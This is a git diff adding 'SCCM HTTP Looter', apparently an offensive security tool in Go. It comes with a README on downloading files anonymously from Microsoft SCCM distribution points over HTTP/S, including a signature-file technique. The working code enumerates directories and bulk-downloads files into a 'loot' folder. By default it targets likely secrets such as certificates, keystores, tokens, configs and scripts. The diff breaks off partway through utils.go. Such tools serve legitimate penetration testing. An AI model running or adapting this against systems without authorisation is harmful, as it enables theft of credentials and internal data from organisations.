diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..4998212 --- /dev/null +++ b/.gitignore @@ -0,0 +1,70 @@ +# Binaries for programs and plugins +*.exe +*.exe~ +*.dll +*.so +*.dylib + +# Test binary, built with `go test -c` +*.test + +# Output of the go coverage tool, specifically when used with LiteIDE +*.out + +# Dependency directories (remove the comment below to include it) +# vendor/ + +# Go workspace file +go.work + +### macOS ### +# General +.DS_Store +.AppleDouble +.LSOverride + +# Icon must end with two \r +Icon + + +# Thumbnails +._* + +# Files that might appear in the root of a volume +.DocumentRevisions-V100 +.fseventsd +.Spotlight-V100 +.TemporaryItems +.Trashes +.VolumeIcon.icns +.com.apple.timemachine.donotpresent + +# Directories potentially created on remote AFP share +.AppleDB +.AppleDesktop +Network Trash Folder +Temporary Items +.apdisk + +### macOS Patch ### +# iCloud generated files +*.icloud + +### VisualStudioCode ### +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +!.vscode/*.code-snippets + +# Local History for Visual Studio Code +.history/ + +# Built Visual Studio Code Extensions +*.vsix + +### VisualStudioCode Patch ### +# Ignore all local history of files +.history +.ionide diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..c1115a1 --- /dev/null +++ b/LICENSE @@ -0,0 +1,7 @@ +Copyright (c) 2024 Bad Sector Labs + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial 
portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/README.md b/README.md new file mode 100644 index 0000000..6ad6670 --- /dev/null +++ b/README.md @@ -0,0 +1,49 @@ +# SCCM HTTP Looter + +## How it works + +SCCM distribution points (DPs) are the servers used by Microsoft SCCM to host all the files used in software installs, patches, script deployments, etc. +By default, these servers allow access via SMB (TCP/445) and HTTP/S (TCP/80 and/or TCP/443) and require some type of Windows authentication (i.e. NTLM). + +The current SCCM DP looting tools rely on the ability to browse SMB shares to collect files. + +- [CMloot](https://github.com/1njected/CMLoot) +- [cmloot](https://github.com/shelltrail/cmloot) + +However, it is not uncommon for an organization to limit inbound SMB access to servers on internal networks, and standard practice to prevent inbound SMB access from the internet. HTTP/S access on the other hand is usually not restricted on internal networks, and often allowed from the internet. This presents an opportunity for an attacker if there is a way to get files from the SCCM DP via HTTP/S. + +### Why hasn't anyone done this before? + +The SMB tools work by enumerating the `DataLib` folder of the `SCCMContentLib$` share to find `.INI` files which contain the hash of the file. They can then locate the actual file at `FileLib/<first 4 chars of hash>/<hash>`. This works because with access to the share, you can enumerate all files in the `DataLib` folder. + +Using HTTP/S, things are different. 
Browsing to `http://<SCCM server>/SMS_DP_SMSPKG$/Datalib` shows a directory listing of numbered files and INIs. + +For a variety of reasons (like [speed](https://old.reddit.com/r/SCCM/comments/5c4niq/sccm_2012_osd_download_faster_with_anonymous/)), these distribution points can be configured to allow anonymous access. + +![](./imgs/iis-settings.png) + +However, navigating to the non-INI links simply shows the same page, which limits the number of files directly accessible to those in the "root" directory of the Datalib as the hashes extracted from the INI files for directories cannot be used to find the directories in the FileLib since it only stores actual files. + +![](./imgs/datalib.png) + +However, browsing to the directory name directly off the `http://<SCCM server>/SMS_DP_SMSPKG$/` root will show files in that directory, which can be directly downloaded. + +![](./imgs/direct-url.png) + +This is how the `sccm-http-looter` works normally. It parses the Datalib directory listing for directories, then requests those and parses each for any files, before downloading any files with extensions that are in the allow list specified by the user. + +In the case where anonymous access is enabled but directory listing for directories off the `http://<SCCM server>/SMS_DP_SMSPKG$/` root are disabled, there is a second technique to retrieve files that can be used by running the tool with `-use-signature-method`. In this mode the tool does the following: + +1. Downloads the Datalib listing from `http://<SCCM server>/SMS_DP_SMSPKG$/Datalib` +2. Parses the Datalib for all links +3. Downloads any non .INI link filenames from `http://<SCCM server>/SMS_DP_SMSSIG$/<filename>.tar`, where `<filename>` is the final element in any href from the Datalib page (i.e. `12300005.1`) +4. Extracts the actual file name from the .tar signature file +5. Downloads the INI file from `http://<SCCM server>/SMS_DP_SMSPKG$/Datalib/<directory>/<filename>.INI` +6. Extracts the hash from the INI file +7. 
Downloads the actual file from `http:///SMS_DP_SMSPKG$//` renaming it to the correct file name as specified in the signature file. + +The signature files are `.tar` files but are not actual tars. They contain filenames 512 bytes before the byte string `0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01` as shown below. + +![](./imgs/signature-hex.png) + +The tool searches for this byte string and extracts all file names from the signature files. diff --git a/download.go b/download.go new file mode 100644 index 0000000..4daef56 --- /dev/null +++ b/download.go @@ -0,0 +1,208 @@ +package main + +import ( + "crypto/sha256" + "encoding/hex" + "errors" + "fmt" + "io" + "log/slog" + "net/http" + "os" + "path/filepath" + "strings" + "sync" +) + +func getDatalibListing(server, outputDir string) (string, error) { + // Ensure the base output directory exists + if err := os.MkdirAll(outputDir, os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err)) + return "", err + } + + url := fmt.Sprintf("%s/SMS_DP_SMSPKG$/Datalib", urlBase) + slog.Info(fmt.Sprintf("Getting Datalib listing from %s...\n", url)) + + response, err := customHTTPClient.Get(url) + if err != nil { + slog.Error(fmt.Sprintf("Error sending GET request: %v\n", err)) + return "", err + } + defer response.Body.Close() + + if response.StatusCode != http.StatusOK { + slog.Error(fmt.Sprintf("Received non-OK status code: %v\n", response.Status)) + return "", fmt.Errorf("received non-OK status code: %v", response.Status) + } + + body, err := io.ReadAll(response.Body) + if err != nil { + slog.Error(fmt.Sprintf("Error reading response body: %v\n", err)) + slog.Error(fmt.Sprintf(` + +Try to download the Datalib manually with curl: +curl -k -A 'sccm-http-looter' %s > datalib.html +then run sccmlooter with '-datalib datalib.html' + +`, url)) + return "", errors.New("error reading response body") + } + + outputFileName := filepath.Join(outputDir, server+"_Datalib.txt") 
+ + err = os.WriteFile(outputFileName, body, 0644) + if err != nil { + slog.Error(fmt.Sprintf("Error writing to file: %v\n", err)) + return "", err + } + + slog.Debug(fmt.Sprintf("Data saved to %s\n", outputFileName)) + return string(body), nil +} + +func downloadINIAndFile(outPath, outPathFiles, filename, dirName string, wg *sync.WaitGroup, semaphore chan struct{}) { + defer func() { + // Read one struct from the semaphore channel to "let go" of one slot/thread + <-semaphore + wg.Done() + }() + + outputPath := filepath.Join(outPath, filename+".INI") + url := fmt.Sprintf("%s/SMS_DP_SMSPKG$/Datalib/%s/%s.INI", urlBase, dirName, filename) + + err := downloadFileFromURL(url, outputPath) + if err != nil { + slog.Debug(fmt.Sprintf("Error downloading %s: %v\n", filename+".INI", err)) + return + } + + slog.Debug(fmt.Sprintf("Downloaded %s to %s\n", filename+".INI", outputPath)) + hash, err := getHashFromINI(outputPath) + if err != nil { + slog.Debug(fmt.Sprintf("Error getting Hash from INI file %s: %v", outputPath, err)) + return + } + + // Get the actual file by its hash but save it to the correct name + if strings.Contains(filename, "/") { + filename = filepath.Base(filename) + } + outputPathFile := filepath.Join(outPathFiles, hash[0:4]+"_sig_"+filename) + fileURL := fmt.Sprintf("%s/SMS_DP_SMSPKG$/FileLib/%s/%s", urlBase, hash[0:4], hash) + + err = downloadFileFromURL(fileURL, outputPathFile) + if err != nil { + slog.Debug(fmt.Sprintf("Error downloading %s/%s: %v\n", hash[0:4], hash, err)) + return + } + + slog.Debug(fmt.Sprintf("Downloaded %s to %s\n", filename, outputPathFile)) + +} + +func downloadFileFromURL(url, outputPath string) error { + slog.Debug(fmt.Sprintf("Downloading %s", url)) + // Send HTTP GET request to the URL + response, err := customHTTPClient.Get(url) + if err != nil { + return err + } + defer response.Body.Close() + + // Check if the response status code is OK + if response.StatusCode != http.StatusOK { + return fmt.Errorf("HTTP request failed 
with status code: %d", response.StatusCode) + } + // Create or truncate the output file + file, err := os.Create(outputPath) + if err != nil { + return err + } + defer file.Close() + + // Copy the response body to the output file + _, err = io.Copy(file, response.Body) + if err != nil { + return err + } + + return nil +} + +func getURL(url string) (string, error) { + slog.Debug(fmt.Sprintf("Getting %s\n", url)) + + response, err := customHTTPClient.Get(url) + if err != nil { + slog.Debug(fmt.Sprintf("Error sending GET request: %v\n", err)) + return "", err + } + defer response.Body.Close() + + if response.StatusCode != http.StatusOK { + slog.Debug(fmt.Sprintf("Received non-OK status code: %v\n", response.Status)) + return "", err + } + + body, err := io.ReadAll(response.Body) + if err != nil { + slog.Debug(fmt.Sprintf("Error reading response body: %v\n", err)) + return "", err + } + return string(body), nil +} + +func downloadFileFromURLAsHashName(url, outputDir string, wg *sync.WaitGroup, semaphore chan struct{}) error { + defer func() { + // Read one struct from the semaphore channel to "let go" of one slot/thread + <-semaphore + wg.Done() + }() + var outputPath string + parts := strings.Split(url, "/") + if !(len(parts) > 0) { + slog.Debug(fmt.Sprintf("could not get file name from URL: %s", url)) + return fmt.Errorf("could not get file name from URL: %s", url) + } + + slog.Debug(fmt.Sprintf("Downloading %s", url)) + + // Send HTTP GET request to the URL + response, err := customHTTPClient.Get(url) + if err != nil { + slog.Debug(fmt.Sprintf("%v", err)) + return err + } + defer response.Body.Close() + + // Check if the response status code is OK + if response.StatusCode != http.StatusOK { + slog.Debug(fmt.Sprintf("HTTP request failed with status code: %d", response.StatusCode)) + return fmt.Errorf("HTTP request failed with status code: %d", response.StatusCode) + } + content, err := io.ReadAll(response.Body) + if err != nil { + slog.Debug(fmt.Sprintf("%v", err)) + 
return err + } + + // Hash the file in memory + hasher := sha256.New() + hasher.Write(content) + hash := strings.ToUpper(hex.EncodeToString(hasher.Sum(nil))) + + // Append the hash to the beginning of the file name + outputPath = filepath.Join(outputDir, hash[0:4]+"_url_"+parts[len(parts)-1]) + + slog.Debug(fmt.Sprintf("Output path: %s", outputPath)) + + // Write the response body to the output file + err = os.WriteFile(outputPath, content, 0644) + if err != nil { + slog.Debug(fmt.Sprintf("%v", err)) + return err + } + + return nil +} diff --git a/file.go b/file.go new file mode 100644 index 0000000..57a1a00 --- /dev/null +++ b/file.go @@ -0,0 +1,133 @@ +package main + +import ( + "bufio" + "fmt" + "log/slog" + "os" + "path/filepath" + "strings" + + "gopkg.in/ini.v1" +) + +func walkDir(signaturesDir string) []string { + // Initialize a slice to store the file paths + filePaths := []string{} + + // Define the function to be called for each file or directory found + walkFn := func(path string, info os.FileInfo, err error) error { + if err != nil { + slog.Error(fmt.Sprintf("Error walking path %s: %v\n", path, err)) + return nil + } + + // Check if it's a regular file (not a directory) + if !info.IsDir() { + filePaths = append(filePaths, path) + } + + return nil + } + + // Recursively walk the directory and collect file paths + err := filepath.Walk(signaturesDir, walkFn) + if err != nil { + slog.Error(fmt.Sprintf("Error walking directory: %v\n", err)) + return nil + } + return filePaths +} + +func getHashFromINI(filePath string) (string, error) { + cfg, err := ini.Load(filePath) + if err != nil { + return "", err + } + + section := cfg.Section("File") + if section == nil { + return "", fmt.Errorf("section 'File' not found in the INI file") + } + + hashValue := section.Key("Hash").String() + return hashValue, nil +} + +func getFileNamesFromSignatureFile(filePath string) ([]string, error) { + // Open the binary file + file, err := os.Open(filePath) + if err != nil { + 
return nil, err + } + defer file.Close() + + // Read the entire file into memory + fileInfo, err := file.Stat() + if err != nil { + return nil, err + } + fileSize := fileInfo.Size() + fileData := make([]byte, fileSize) + _, err = file.Read(fileData) + if err != nil { + return nil, err + } + + // Define the byte signature to search for + signature := []byte{0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01} + + // Initialize a slice to store the file strings where the signature is found + strings := []string{} + + // Search for the signature in the file data + for i := 0; i < (len(fileData) - len(signature)); i++ { + if bytesEqual(fileData[i:i+len(signature)], signature) { + // Calculate the start offset for the string (512 bytes before the signature) + startOffset := i - 512 + if startOffset < 0 { + startOffset = 0 + } + + // Find the end of the string (up to the first null byte) + endOffset := startOffset + for endOffset < len(fileData) && fileData[endOffset] != 0x00 { + endOffset++ + } + + // Extract the string + stringBytes := fileData[startOffset:endOffset] + + strings = append(strings, string(stringBytes)) + } + } + + return strings, nil +} + +func writeStringArrayToFile(filePath string, stringArray []string) { + file, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + fmt.Println("Error creating file:", err) + return + } + defer file.Close() + + // Create a buffered writer + writer := bufio.NewWriter(file) + + // Join the strings with a newline character and write to the file + line := strings.Join(stringArray, "\n") + _, err = writer.WriteString(line) + if err != nil { + fmt.Println("Error writing to file:", err) + return + } + + // Flush the buffered writer to ensure all data is written + err = writer.Flush() + if err != nil { + fmt.Println("Error flushing writer:", err) + return + } +} diff --git a/go.mod b/go.mod new file mode 100644 index 0000000..42a82c4 --- /dev/null +++ b/go.mod @@ -0,0 +1,19 @@ 
+module sccmlooter + +go 1.22 + +require ( + golang.org/x/net v0.15.0 + gopkg.in/ini.v1 v1.67.0 +) + +require ( + github.com/k0kubun/go-ansi v0.0.0-20180517002512-3bf9e2903213 + github.com/mattn/go-isatty v0.0.20 // indirect + github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db // indirect + github.com/rivo/uniseg v0.4.7 // indirect + github.com/schollz/progressbar/v3 v3.14.2 + github.com/stretchr/testify v1.9.0 // indirect + golang.org/x/sys v0.18.0 // indirect + golang.org/x/term v0.18.0 // indirect +) diff --git a/go.sum b/go.sum new file mode 100644 index 0000000..14d31ee --- /dev/null +++ b/go.sum @@ -0,0 +1,32 @@ +github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= +github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/k0kubun/go-ansi v0.0.0-20180517002512-3bf9e2903213 h1:qGQQKEcAR99REcMpsXCp3lJ03zYT1PkRd3kQGPn9GVg= +github.com/k0kubun/go-ansi v0.0.0-20180517002512-3bf9e2903213/go.mod h1:vNUNkEQ1e29fT/6vq2aBdFsgNPmy8qMdSay1npru+Sw= +github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY= +github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= +github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db h1:62I3jR2EmQ4l5rM/4FEfDWcRD+abF5XlKShorW5LRoQ= +github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db/go.mod h1:l0dey0ia/Uv7NcFFVbCLtqEBQbrT4OCwCSKTEv6enCw= +github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= +github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ= +github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= +github.com/schollz/progressbar/v3 v3.14.2 h1:EducH6uNLIWsr560zSV1KrTeUb/wZGAHqyMFIEa99ks= 
+github.com/schollz/progressbar/v3 v3.14.2/go.mod h1:aQAZQnhF4JGFtRJiw/eobaXpsqpVQAftEQ+hLGXaRc4= +github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= +github.com/stretchr/testify v1.9.0 h1:HtqpIVDClZ4nwg75+f6Lvsy/wHu+3BoSGCbBAcpTsTg= +github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= +golang.org/x/net v0.15.0 h1:ugBLEUaxABaB5AJqW9enI0ACdci2RUd4eP51NTBvuJ8= +golang.org/x/net v0.15.0/go.mod h1:idbUs1IY1+zTqbi8yxTbhexhEEk5ur9LInksu6HrEpk= +golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.17.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= +golang.org/x/sys v0.18.0 h1:DBdB3niSjOA/O0blCZBqDefyWNYveAYMNF1Wum0DYQ4= +golang.org/x/sys v0.18.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= +golang.org/x/term v0.17.0/go.mod h1:lLRBjIVuehSbZlaOtGMbcMncT+aqLLLmKrsjNrUguwk= +golang.org/x/term v0.18.0 h1:FcHjZXDMxI8mM3nwhX9HlKop4C0YQvCVCdwYl2wOtE8= +golang.org/x/term v0.18.0/go.mod h1:ILwASektA3OnRv7amZ1xhE/KTR+u50pbXfZ03+6Nx58= +gopkg.in/ini.v1 v1.67.0 h1:Dgnx+6+nfE+IfzjUEISNeydPJh9AXNNsWbGP9KzCsOA= +gopkg.in/ini.v1 v1.67.0/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k= +gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= +gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= diff --git a/html.go b/html.go new file mode 100644 index 0000000..878454c --- /dev/null +++ b/html.go @@ -0,0 +1,35 @@ +package main + +import ( + "strings" + + "golang.org/x/net/html" +) + +func extractFileNames(htmlContent string) []string { + var fileNames []string + + tokenizer := html.NewTokenizer(strings.NewReader(htmlContent)) + + for { + tokenType := tokenizer.Next() + + switch tokenType { + case html.ErrorToken: + return fileNames + case html.StartTagToken, html.SelfClosingTagToken: + token := tokenizer.Token() + if 
token.Data == "a" { + for _, attr := range token.Attr { + if attr.Key == "href" { + // Extract the file name from the href attribute + fileName := extractFileName(attr.Val) + if fileName != "" { + fileNames = append(fileNames, fileName) + } + } + } + } + } + } +} diff --git a/http-client.go b/http-client.go new file mode 100644 index 0000000..6d0ba55 --- /dev/null +++ b/http-client.go @@ -0,0 +1,51 @@ +package main + +import ( + "crypto/tls" + "fmt" + "log/slog" + "net/http" + "os" + "time" +) + +func createCustomHTTPClient(userAgent string, validate bool, httpTimeout string) http.Client { + transport := &http.Transport{ + DisableKeepAlives: true, + TLSClientConfig: &tls.Config{ + Renegotiation: tls.RenegotiateOnceAsClient, + InsecureSkipVerify: validate, + }, + } + + customTimeout, err := time.ParseDuration(httpTimeout) + if err != nil { + slog.Error(fmt.Sprintf("Unable to parse HTTP Timeout value: %s", httpTimeout)) + os.Exit(1) + } + + // Create a custom http.Client + client := &http.Client{ + Timeout: customTimeout, + Transport: transport, + } + + // Set the User-Agent header globally for this client + client.Transport = &customTransport{ + Transport: transport, + UserAgent: userAgent, + } + + return *client +} + +// customTransport is a custom http.RoundTripper that sets the User-Agent header +type customTransport struct { + Transport http.RoundTripper + UserAgent string +} + +func (t *customTransport) RoundTrip(req *http.Request) (*http.Response, error) { + req.Header.Set("User-Agent", t.UserAgent) + return t.Transport.RoundTrip(req) +} diff --git a/imgs/datalib.png b/imgs/datalib.png new file mode 100644 index 0000000..95337d3 Binary files /dev/null and b/imgs/datalib.png differ diff --git a/imgs/direct-url.png b/imgs/direct-url.png new file mode 100644 index 0000000..67a9626 Binary files /dev/null and b/imgs/direct-url.png differ diff --git a/imgs/iis-settings.png b/imgs/iis-settings.png new file mode 100644 index 0000000..a7dca23 Binary files /dev/null and 
b/imgs/iis-settings.png differ diff --git a/imgs/signature-hex.png b/imgs/signature-hex.png new file mode 100644 index 0000000..57eab6c Binary files /dev/null and b/imgs/signature-hex.png differ diff --git a/main.go b/main.go new file mode 100644 index 0000000..1277882 --- /dev/null +++ b/main.go @@ -0,0 +1,178 @@ +package main + +import ( + "flag" + "fmt" + "log/slog" + "net/http" + "os" + "path/filepath" + "strings" + "sync" + + "github.com/k0kubun/go-ansi" + "github.com/schollz/progressbar/v3" +) + +var customHTTPClient http.Client +var urlBase string + +func main() { + protocol := flag.String("protocol", "http", "The protocol (http or https)") + server := flag.String("server", "127.0.0.1", "The IP address or hostname of the SCCM DP") + port := flag.String("port", "80", "The port of the HTTP(S) server on the SCCM DP") + outputDir := flag.String("output", "./loot", "The base output directory for files related to this DP") + fileAllowList := flag.String("allow", "ps1,vbs,txt,cmd,bat,pfx,pem,cer,certs,expect,sql,xml,ps1xml,config,ini,ksh,sh,rsh,py,keystore,reg,yml,yaml,token,script,sqlite,plist,au3,cfg", "A comma-separated list of file extensions (no dot) to allow. 
Use 'all' to allow all file types") + numThreads := flag.Int("threads", 1, "Number of threads (goroutines) for concurrent downloading") + validate := flag.Bool("validate", false, "Validate HTTPS certificates") + datalibPath := flag.String("datalib", "", "Path to a DataLib directory listing download (for cases where the listing cannot be retrieved with this tool)") + signaturesPath := flag.String("signatures", "", "Path to a directory containing .tar signatures (for cases where you want to reprocess a server without having to re-download signatures)") + downloadNoExt := flag.Bool("downloadnoext", false, "Download files without a file extension") + userAgent := flag.String("useragent", "sccm-http-looter", "User agent to use for all requests") + httpTimeout := flag.String("timeout", "10s", "HTTP timeout value, use a number + 'ms', 's', 'm', or 'h' for values") + randomize := flag.Bool("randomize", false, "randomize the order of requests for signatures and files") + verbose := flag.Bool("verbose", false, "print debug/error statements") + signatureMethod := flag.Bool("use-signature-method", false, "get filenames from signature files") + urlsPath := flag.String("urlsPath", "", "Path to a file containing URLs (for cases where you want to reprocess downloads without re-scraping the URLs)") + + flag.Parse() + + slog.Info("SCCM HTTP Looter by Bad Sector Labs (@badsectorlabs)") + + allowExtensions := strings.Split(*fileAllowList, ",") + + customHTTPClient = createCustomHTTPClient(*userAgent, !*validate, *httpTimeout) + + urlBase = fmt.Sprintf("%s://%s:%s", *protocol, *server, *port) + + if *verbose { + slog.SetLogLoggerLevel(slog.LevelDebug) + } + + // Get the DataLib HTML content from the server or from disk + var datalibBody string + if *datalibPath == "" { + var err error + datalibBody, err = getDatalibListing(*server, *outputDir) + if err != nil { + if strings.Contains(err.Error(), "401") { + writeStringArrayToFile(filepath.Join(*outputDir, "401"), []string{}) + } else if 
strings.Contains(err.Error(), "404") { + writeStringArrayToFile(filepath.Join(*outputDir, "404"), []string{}) + } else if strings.Contains(err.Error(), "error reading response body") { + writeStringArrayToFile(filepath.Join(*outputDir, "body error"), []string{}) + } + return + } + } else { + content, err := os.ReadFile(*datalibPath) + if err != nil { + slog.Error(fmt.Sprintf("Unable to read file: %s", *datalibPath)) + return + } + datalibBody = string(content) + } + fileNames := extractFileNames(datalibBody) + // Use the filenames from Datalib to pull down signature files, parse them, and finally download files + if *signatureMethod { + // Get all the signature files from the server, or a gather a list from disk + var filePaths []string + if *signaturesPath == "" { + getSignatures(*outputDir, fileNames, *numThreads, *randomize) + filePaths = walkDir(filepath.Join(*outputDir, "signatures")) + if filePaths == nil { + slog.Error("No signature files found!") + return + } + } else { + filePaths = walkDir(*signaturesPath) + } + + if *randomize { + randomizeStrings(filePaths) + } + + bar := progressbar.NewOptions(len(filePaths), + progressbar.OptionSetWriter(ansi.NewAnsiStdout()), + progressbar.OptionEnableColorCodes(true), + progressbar.OptionShowBytes(false), + progressbar.OptionShowCount(), + progressbar.OptionShowElapsedTimeOnFinish(), + progressbar.OptionSetWidth(30), + progressbar.OptionSetDescription("[cyan][2/2][reset] Getting files..."), + progressbar.OptionSetTheme(progressbar.Theme{ + Saucer: "[green]=[reset]", + SaucerHead: "[green]>[reset]", + SaucerPadding: " ", + BarStart: "[", + BarEnd: "]", + })) + + totalFiles := 0 + // Get all the file names from every signature, then download the INI and finally the binary + for _, filePath := range filePaths { + bar.Add(1) + + fileNames, err := getFileNamesFromSignatureFile(filePath) + if err != nil { + slog.Error("Error:", err) + continue + } + // Save filenames to disk + 
writeStringArrayToFile(filepath.Join(*outputDir, *server+"_files.txt"), fileNames) + totalFiles += len(fileNames) + // Download all the wanted files + downloadFiles(*outputDir, filePath, fileNames, allowExtensions, *downloadNoExt, *numThreads, *randomize) + } + bar.Finish() + } else { // URL method + // Just use the datalib to loop over directories and look for files directly + slog.Info(fmt.Sprintf("Found %d Directories in the Datalib", len(fileNames))) + if *urlsPath == "" { + allFileURLs := getAllFileURLsFromDirNames(fileNames, *numThreads, *randomize) + writeStringArrayToFile(filepath.Join(*outputDir, *server+"_urls.txt"), allFileURLs) + } else { + slog.Info(fmt.Sprintf("Using provided URLs file: %s", *urlsPath)) + content, err := os.ReadFile(*urlsPath) + if err != nil { + slog.Error(fmt.Sprintf("Unable to read file: %s", *urlsPath)) + return + } + allFileURLs = strings.Split(string(content), "\n") + } + bar := progressbar.NewOptions(len(allFileURLs), + progressbar.OptionSetWriter(ansi.NewAnsiStdout()), + progressbar.OptionEnableColorCodes(true), + progressbar.OptionShowBytes(false), + progressbar.OptionShowCount(), + progressbar.OptionShowElapsedTimeOnFinish(), + progressbar.OptionSetWidth(30), + progressbar.OptionSetDescription("[cyan][2/2][reset] Getting files..."), + progressbar.OptionSetTheme(progressbar.Theme{ + Saucer: "[green]=[reset]", + SaucerHead: "[green]>[reset]", + SaucerPadding: " ", + BarStart: "[", + BarEnd: "]", + })) + var wg sync.WaitGroup + wg.Add(len(allFileURLs)) + + // Create a channel to limit the number of concurrent downloads + semaphore := make(chan struct{}, *numThreads) + + for _, fileURL := range allFileURLs { + bar.Add(1) + wanted, outputDir := fileWanted(allowExtensions, *downloadNoExt, extractFileName(fileURL), *outputDir) + if wanted { + // Add an empty struct to the semaphore channel to "take up" one slot/thread + semaphore <- struct{}{} + go downloadFileFromURLAsHashName(fileURL, outputDir, &wg, semaphore) + } + } + 
bar.Finish() + } + + slog.Info("SCCM Looting complete!") + +} diff --git a/signature.go b/signature.go new file mode 100644 index 0000000..61b540c --- /dev/null +++ b/signature.go @@ -0,0 +1,84 @@ +package main + +import ( + "fmt" + "log/slog" + "os" + "path/filepath" + "strings" + "sync" + + "github.com/k0kubun/go-ansi" + "github.com/schollz/progressbar/v3" +) + +func getSignatures(outputDir string, filenames []string, numThreads int, randomize bool) { + + // Ensure the output directory exists + if err := os.MkdirAll(filepath.Join(outputDir, "signatures"), os.ModePerm); err != nil { + slog.Error(fmt.Sprintf("Error creating base output directory: %v\n", err)) + return + } + + // Create a wait group to wait for all goroutines to finish + var wg sync.WaitGroup + wg.Add(len(filenames)) + + // Create a channel to limit the number of concurrent downloads + semaphore := make(chan struct{}, numThreads) + + if randomize { + randomizeStrings(filenames) + } + + bar := progressbar.NewOptions(len(filenames), + progressbar.OptionSetWriter(ansi.NewAnsiStdout()), + progressbar.OptionEnableColorCodes(true), + progressbar.OptionShowBytes(false), + progressbar.OptionShowCount(), + progressbar.OptionShowElapsedTimeOnFinish(), + progressbar.OptionSetWidth(30), + progressbar.OptionSetDescription("[cyan][1/2][reset] Getting signature files..."), + progressbar.OptionSetTheme(progressbar.Theme{ + Saucer: "[green]=[reset]", + SaucerHead: "[green]>[reset]", + SaucerPadding: " ", + BarStart: "[", + BarEnd: "]", + })) + + // Iterate over the filenames and download the files + for _, filename := range filenames { + bar.Add(1) + // Skip INI files as they never have signatures - reduces requests by half! 
+ if strings.HasSuffix(filename, ".INI") { + wg.Done() // Still need to decrement the wg as we used all file names for the wg size + continue + } + + // Add an empty struct to the semaphore channel to "take up" one slot/thread + semaphore <- struct{}{} + + go func(filename string) { + defer func() { + // Read one struct from the semaphore channel to "let go" of one slot/thread + <-semaphore + wg.Done() + }() + + url := fmt.Sprintf("%s/SMS_DP_SMSSIG$/%s.tar", urlBase, filename) + outputPath := filepath.Join(outputDir, "signatures", filename+".tar") + + // Download the file + err := downloadFileFromURL(url, outputPath) + if err != nil { + slog.Debug(fmt.Sprintf("Error downloading signature %s.tar: %v\n", filename, err)) + return + } + + slog.Debug(fmt.Sprintf("Downloaded %s to %s\n", filename, outputPath)) + }(filename) + } + wg.Wait() + bar.Finish() +} diff --git a/utils.go b/utils.go new file mode 100644 index 0000000..0a5d632 --- /dev/null +++ b/utils.go @@ -0,0 +1,251 @@ +package main + +import ( + "fmt" + "log/slog" + "math/rand" + "os" + "path/filepath" + "regexp" + "slices" + "sort" + "strings" + "sync" + "time" + + "github.com/k0kubun/go-ansi" + "github.com/schollz/progressbar/v3" +) + +var allFileURLs []string + +func downloadFiles(outputDir, filePath string, fileNames, allowExtensions []string, downloadNoExt bool, numThreads int, randomize bool) { + filenameWithExt := filepath.Base(filePath) + dirName := 